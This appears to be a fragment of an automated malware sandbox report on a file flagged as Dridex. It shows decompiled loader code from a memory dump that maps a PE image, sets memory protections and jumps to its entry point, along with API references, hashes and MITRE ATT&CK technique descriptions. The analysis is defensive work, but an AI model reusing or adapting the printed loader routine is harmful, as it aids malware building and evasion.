				intOrPtr _t239;
				void* _t246;
				intOrPtr* _t250;
				intOrPtr _t258;
				DWORD* _t271;
				void* _t275;
				intOrPtr* _t278;
				intOrPtr* _t279;

				_t141 = _a4;
				_v20 = 0;
				_t246 =  *((intOrPtr*)(_t141 + 0x28));
				 *0x2fe4418 = 1;
				asm("movaps xmm0, [0x2fe3010]");
				asm("movups [0x2fe4428], xmm0");
				_v48 = _t141;
				_v52 =  *((intOrPtr*)(_t141 + 0x38));
				_v56 =  *((intOrPtr*)(_v48 + 0x18));
				_v192 = _t246;
				_v60 =  *((intOrPtr*)(_v48 + 0x10));
				_v188 = _v52;
				_v184 = 4;
				_v180 =  &_v20;
				_v64 =  *((intOrPtr*)(_t141 + 0x4c));
				_v68 = 4;
				_v72 = _t246;
				_v76 =  &_v20;
				_t148 = VirtualProtect(__ebx, __esi, __edi, _t271); // executed
				_v80 = _t148;
				_v192 = _v72;
				_v188 = 0;
				_v184 =  *((intOrPtr*)(_v48 + 0x38));
				_v84 = 0x400;
				_v88 = 2;
				_v92 =  &_v20;
				_v96 = 0;
				E02FE140D();
				E02FE17BE(_v72,  *((intOrPtr*)(_v48 + 8)), _v56);
				E02FE140D( *((intOrPtr*)(_v48 + 8)), 0, _v56);
				_t156 = VirtualProtect(_v72, 0x400, 2, _v92); // executed
				_t278 = _t275 - 0x90;
				_t236 = _v72;
				_t258 =  *((intOrPtr*)(_t236 + 0x3c));
				_v100 = _t156;
				_v104 = _v72 + 0x3c;
				_v108 = _t236;
				_v112 = _t258;
				if(_t258 != 0) {
					_v108 = _v72 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v168 = _v108;
				if(_v60 != 0) {
					_v144 = 0;
					_v140 = _v168 + 0x18 + ( *(_v168 + 0x14) & 0x0000ffff);
					while(1) {
						_t170 = _v140;
						_t204 =  *(_t170 + 0x24);
						_v148 = _t170;
						_v152 = _t204 >> 0x0000001e & 0x00000001;
						_v156 = _t204 >> 0x1f;
						_v192 = _v72 +  *((intOrPtr*)(_t170 + 0xc));
						_v188 =  *((intOrPtr*)(_v148 + 8));
						_v184 =  *((intOrPtr*)(0x2fe4418 + (_v152 << 4) + (_v156 << 3) + ((_t204 >> 0x0000001d & 0x00000001) << 2)));
						_v180 =  &_v20;
						_v160 = _v144;
						_t182 = VirtualProtect(??, ??, ??, ??); // executed
						_t278 = _t278 - 0x10;
						_t224 = _v160 + 1;
						_v164 = _t182;
						_v144 = _t224;
						_v140 = _v148 + 0x28;
						if(_t224 == _v60) {
							goto L8;
						}
					}
				}
				L8:
				 *_t278 = _v72;
				_v120 = _v72 +  *((intOrPtr*)(_v48 + 0x40));
				_t160 = DisableThreadLibraryCalls(??);
				_t279 = _t278 - 4;
				_t239 =  *_v104;
				_v172 = _t160;
				_v176 = _t239;
				_v116 = _v72;
				if(_t239 == 0) {
					L2:
					_t250 = _v48;
					_v44 =  *((intOrPtr*)(_t250 + 4));
					_v40 =  *_t250;
					_v36 =  *((intOrPtr*)(_t250 + 0x3c));
					_v32 =  *((intOrPtr*)(_t250 + 0x20));
					_v28 =  *((intOrPtr*)(_t250 + 0x2c));
					_v24 = _v120;
					 *_t279 = _t250;
					_v192 = 0;
					_v188 = 0x5c;
					_v124 =  &_v44;
					_v128 = 0;
					_v132 = 0x5c;
					_v136 =  *((intOrPtr*)(_v116 + 0x28));
					E02FE140D();
					if(_v136 != 0) {
						_t278 =  *((intOrPtr*)( &_v44 + 0x10));
						goto __eax;
					}
					return 1;
				} else {
					_v116 = _v72 + (_v176 + 0x0000ffff & 0x0000ffff) + 1;
					goto L2;
				}
			}

0x02fe1d48
0x02fe1d56
0x02fe1d5d
0x02fe1d60
0x02fe1d6a
0x02fe1d71
0x02fe1d7b
0x02fe1d81
0x02fe1d8a
0x02fe1d93
0x02fe1d96
0x02fe1d9c
0x02fe1da0
0x02fe1da8
0x02fe1dac
0x02fe1daf
0x02fe1db2
0x02fe1db5
0x02fe1db8
0x02fe1dd2
0x02fe1dd8
0x02fe1ddb
0x02fe1de3
0x02fe1de7
0x02fe1dea
0x02fe1ded
0x02fe1df0
0x02fe1df3
0x02fe1e0f
0x02fe1e2c
0x02fe1e51
0x02fe1e53
0x02fe1e5c
0x02fe1e5f
0x02fe1e69
0x02fe1e6c
0x02fe1e6f
0x02fe1e72
0x02fe1e75
0x02fe1fd2
0x02fe1fd2
0x02fe204c
0x02fe2052
0x02fe1fee
0x02fe1ff4
0x02fe1f07
0x02fe1f07
0x02fe1f22
0x02fe1f25
0x02fe1f33
0x02fe1f44
0x02fe1f70
0x02fe1f73
0x02fe1f77
0x02fe1f7b
0x02fe1f82
0x02fe1f88
0x02fe1f8a
0x02fe1f93
0x02fe1fa4
0x02fe1faa
0x02fe1fb0
0x02fe1fb6
0x00000000
0x00000000
0x02fe1fb8
0x02fe1f07
0x02fe1fff
0x02fe200d
0x02fe2015
0x02fe2018
0x02fe201a
0x02fe2020
0x02fe202c
0x02fe2032
0x02fe2038
0x02fe203b
0x02fe1e80
0x02fe1e90
0x02fe1e96
0x02fe1e9b
0x02fe1ea1
0x02fe1ea7
0x02fe1ead
0x02fe1eb3
0x02fe1eb6
0x02fe1eb9
0x02fe1ec1
0x02fe1ec9
0x02fe1ecc
0x02fe1ecf
0x02fe1ed2
0x02fe1ed8
0x02fe1ee6
0x02fe1efa
0x02fe1f00
0x02fe1f00
0x02fe206f
0x02fe2041
0x02fe2093
0x00000000
0x02fe2093

APIs

VirtualProtect.KERNELBASE ref: 02FE1DB8
VirtualProtect.KERNELBASE ref: 02FE1E51
VirtualProtect.KERNELBASE ref: 02FE1F88

Strings

\, xrefs: 02FE1EC1

Memory Dump Source

Source File: 00000003.00000002.702403051.0000000002FE0000.00000040.00000001.sdmp, Offset: 02FE0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: 31151f29e6c82c7d767603caabc695a8e977c1ad85db9394013f74a771c4a7b6
Instruction ID: 07b18ec87f4ef5370316b7e33677cc76009ca49a92a41e43b01e99b7ace87386
Opcode Fuzzy Hash: 31151f29e6c82c7d767603caabc695a8e977c1ad85db9394013f74a771c4a7b6
Instruction Fuzzy Hash: E6B1BDB5E002198FCB14CF59C980A9DFBF1FF48314F1585AAE959AB351D730A981CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02FE184E, Relevance: 1.4, APIs: 1, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 02FE18BC

Memory Dump Source

Source File: 00000003.00000002.702403051.0000000002FE0000.00000040.00000001.sdmp, Offset: 02FE0000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 77a4ce7cbd9b0b6e3dfb75932d68ed1e485d91fe3d93fc30e60a4b16e5e7962b
Instruction ID: 8098ec63c303dc83ba2d9a2d5751c9670a4d67bde2402288278484c0b629962e
Opcode Fuzzy Hash: 77a4ce7cbd9b0b6e3dfb75932d68ed1e485d91fe3d93fc30e60a4b16e5e7962b
Instruction Fuzzy Hash: 494106B1E052199FDB08DF99D890AAEBBF1FF88350F14852EE549AB340D775A840CF80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report triage_dropped_file

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

Function 6E7D0730, Relevance: 5.2, APIs: 3, Instructions: 650
COMMONCrypto

Function 6E7D2234, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Function 6E7D2820, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Function 6E7D3138, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 6E7D5E84, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45
fileCOMMON

Function 6E7D10A4, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Function 6E7D57B4, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Function 6E7D5B3C, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Function 6E7D1166, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Function 6E7D5BE5, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6E7D5BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6E7D5BD1, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Function 6E7D5BB3, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Function 6E7D5C01, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Function 6E7D5E10, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 6E7D564C, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Function 6E7D1030, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Function 6E7D3628, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Function 6E7C1494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Function 6E7CA4E8, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Function 6E7C8428, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Function 6E7D9370, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 6E7D143C, Relevance: .6, Instructions: 572
COMMONCrypto

Function 6E7C6D0C, Relevance: .0, Instructions: 36
COMMON

Function 02FE1D3C, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 232
memoryCOMMON